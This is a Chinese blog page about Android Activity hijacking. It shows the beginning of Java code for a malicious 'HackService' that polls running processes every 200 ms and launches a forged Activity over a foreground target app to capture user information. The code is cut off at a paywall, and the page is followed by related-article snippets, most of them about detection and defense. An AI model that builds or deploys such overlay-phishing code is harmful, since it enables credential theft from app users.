Android-Activity劫持

最新推荐文章于 2021-08-25 19:02:56 发布
原创 最新推荐文章于 2021-08-25 19:02:56 发布 · 1.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #移动安全

本文探讨了Android系统的一个设计缺陷,当Activity使用FLAG_ACTIVITY_NEW_TASK标志时,可能导致Activity劫持。利用此漏洞,攻击者可以劫持用户信息、无限弹窗等。文章介绍了实现Activity劫持的步骤,包括使用hackService执行主要逻辑,创建hackApplication自定义应用,以及在MainActivity中展示伪造Activity的效果。

Android-Acitivity劫持

由于Android的设计缺陷,当我们为Activity指定标志位FLAG_ ACTIVITY_ NEW_ TASK时,就能使Activity置于栈顶,并呈现给用户。

当然利用这个缺陷可以做很多羞羞的事情 【==】可以劫持用户信息,可以无限弹框(-。-;)等等ect.

今天我们来实现Activity劫持的代码:

1.通过遍历所有的进程,得到当前前台正在运行的应用进程

2.判断是否是目标进程,如果是启动伪造的Activity,对用户信息进行劫持。

hackService用于执行劫持主要逻辑

public class HackService extends Service {
//targetMap用于存放我们的目标程序
HashMap<String, Class<?>> targetMap = new HashMap<String, Class<?>>();
Handler handler = new Handler();
boolean isStart = false;

//我们新建一个Runnable对象,每隔200ms进行一次搜索
Runnable searchTarget = new Runnable() {
    @Override
    public void run() {
        //得到ActivityManager
        ActivityManager activityManager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
        //通过ActivityManager将当前正在运行的进程存入processInfo中
        List<ActivityManager.RunningAppProcessInfo> processInfo = activityManager.getRunningAppProcesses();
        Log.w("恶意软件", "遍历进程");
        //遍历processInfo中的进程信息,看是否有我们的目标
        for (ActivityManager.RunningAppProcessInfo _processInfo : processInfo) {
            //若processInfo中的进程正在前台且是我们的目标进程,则调用hijack方法进行劫持
            if (_processInfo.importance == ActivityManager.RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
                i
最低0.47元/天 解锁文章
Android安全风险与防范措施--Activity劫持
weixin_56945835的博客
04-14 2025
Activity劫持风险与防范措施 在Android系统问世不久,曾发生过这样的事情,用户在正常输入用户名、密码的情况,账密信息缺被盗的情况,why? 我们在使用银行类app时,只要我们的银行app客户端退至后台,为啥总会提示下我们,“***已退至后台”的字样,why? 今天我们就起来聊聊 activity劫持的那些事。 Activity是我们构建app应用的基本页面,而android app activity页面的管理,是通过栈 来管理的。而在activity 启动时,“FLAG_ACTIVITY_
android app渗透测试-Activity、Service
LJFYYJ的博客
08-02 2504
android Activity、Service的部分攻击面介绍;通过aidl接口调用解题的CTF实例
activity劫持
09-17
activity劫持演示文档和apk
Android界面防劫持Activity劫持,无视Android系统版本限制,无需操作栈
01-20
Android Activity劫持,界面防劫持,无视Android系统版本限制,无需操作栈
Android Activity劫持方案
黄小梁的博客
08-25 5452
最近,安全合规部门又对金融类、银行类app进行了大规模的多方面安全检查,其中有安全问题:Activity劫持。其实Android界面防劫持我们app这边也是做了的,但是为啥还会有这些问题呢?自我感觉就是绝不会有此类问题,于是我们向检测部门要了劫持工具,但是事实往往是打脸的。。。。。 那么什么是Activity劫持呢?简单的说就是我们APP正常的Activity界面被恶意攻替换上仿冒的恶意Activity界面进行攻击和非法用途。界面劫持攻击通常难被识别出来,其造成的后果必然会给用户带来严重损失。 举个例.
Activity_Hijack.apk
04-19
用途:该工具主要用于APP劫持检测。 使用方法:安装HijackActivity.apk,使用 activity 界面劫持工具,在工具中指定要劫持的应用进程名称。如图所示,从列表中选择被测试的应用,点击 OK。打开应用,测试工具会尝试用自己的窗口覆盖被测的应用,如果劫持成功,会出现如下界面。 威胁等级:若客户端无法抵抗 Activity 界面劫持攻击时为中风险;若可以抵抗攻击则无风险。 安全建议:Activity劫持通常依靠注册Receiver响应android.intent.action.BOOT_COMPLETED事件。客户端程序可以在启动前检查Receiver并报警;由于Activity界面劫持攻击通常是将自己的页面附着在客户端之上,因此需要进行界面切换操作,因此在界面切换到后台时弹出警告信息也可以达到定的效果。除此之外,因为Android进程栈的工作原理,建议开发客户端时针对进程栈进行相应的保护,可禁止其他进程放置于客户端之上。
activity劫持劫持
nailsoul的专栏
09-17 2万+
1、Activity调度机制 android为了提高用户的用户体验,对于不同的应用程序之间的切换,基本上是无缝。他们切换的只是activity,让切换的到前台显示,个应用则被覆盖到后台,不可见。Activity的概念相当于个与用户交互的界面。而Activity的调度是交由Android系统中的AmS管理的。AmS即ActivityManagerService(Activity管理服
Android Hook Activity 启动劫持
02-27
`Android Hook Activity 启动劫持`是种高级技术,它允许开发者利用动态代理(Dynamic Proxy)技术来拦截并控制AMS的行为,从而在不修改系统源码的情况下,实现对Activity启动流程的监控或修改。 首先,我们需要...
Android activity劫持
11-29
然而,由于Android的开放性,Activity可能会遭受恶意攻击,其中种常见的方式就是Activity劫持。这通常发生在恶意应用通过不当手段获取到目标应用的Activity启动意图(Intent)后,提前启动或插入到目标Activity的...
Android静态安全检查(五):Activity劫持
不忘初心的专栏
07-08 3872
什么是Activity劫持般情况下分为两种第种是,手机里面安装了恶意程序,恶意程序会注册个Receiver,响应android.intent.action.BOOT_COMPLETED事件,这个Service会启动个定时器,不停的循环查询当前运行的进程。旦当前的进程正是我们要劫持的,并运行在前台,立马使用FLAG_ACTIVITY_NEW_TASK启动自己的恶意应用界面处于栈顶,用户看到...
Activity_Hijack测试工具.rar
09-16
个应用程序通过action来启动某个Activity时,个恶意应用可以创建个同样的action来接收Activity。在Android应用中,如果存在多个Activity接收同个action,那么就会提供个选择列表让用户进行选择。旦用户选错了,就进入了恶意程序的界面,当用户输入隐私信息,有可能被恶意程序将数据发送给服务器,导致用户信息泄露。
hijack,个嗅探工具
12-17
hijack嗅探工具是可以嗅探ftp,3389,http的利器。cain有时候会使目标掉线,这个就不会。很好用。
activity测试
07-22
activity测试
App客户端劫持及简单防护
云守护的专栏
07-02 5140
转自:http://blog.nsfocus.net/app-client-hijacking-simple-protection/Android APP客户端安全评估中,有项叫做activity界面劫持。该bug的攻击场景是,当手机中的恶意APP检测到当前运行的为目标APP时,就启动自身的钓鱼界面覆盖到目标APP之上,以欺骗用户输入账号密码等。本文将要归纳Android各个版本可以使用的检测当...
Android 安全Activity 劫持防护
Android技术之家
07-01 1288
文本讲解 AndroidActivity 劫持防护的具体方法,公司开发的的项目在安全检查中出现 Activity劫持的问题。在网上有很多关于 Activity 劫持防护方式实践...
Android 界面防劫持
xyyh6600的博客
07-31 2109
https://dun.163.com/news/p/47d0c43eb1854bae91872edc656dbd9e https://www.jianshu.com/p/d4677e837648
AndroidActivity界面劫持劫持
热门推荐
LVXIANGAN的专栏
02-09 2万+
总结: Activity劫持原理1、注册个receiver,响应android.intent.action.BOOT_COMPLETED,使得开机启动个service;这个service,会启动个计时器,不停循环查询所有当前运行的进程(因为app可以枚举系统当前运行进程而无需声明其他权限) 2、旦发现当前某进程的Activity正是我们想要劫持的,并运行在前台,我们立马使用FLAG_A...
深入解析Android activity劫持技术与防御
Android安全领域中,“Activity劫持”是个重要的议题。Activity劫持是指攻击者通过某些手段控制或篡改应用程序的Activity组件,从而实现对应用程序正常功能的破坏或实现未授权的操作。这种攻击方式主要针对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值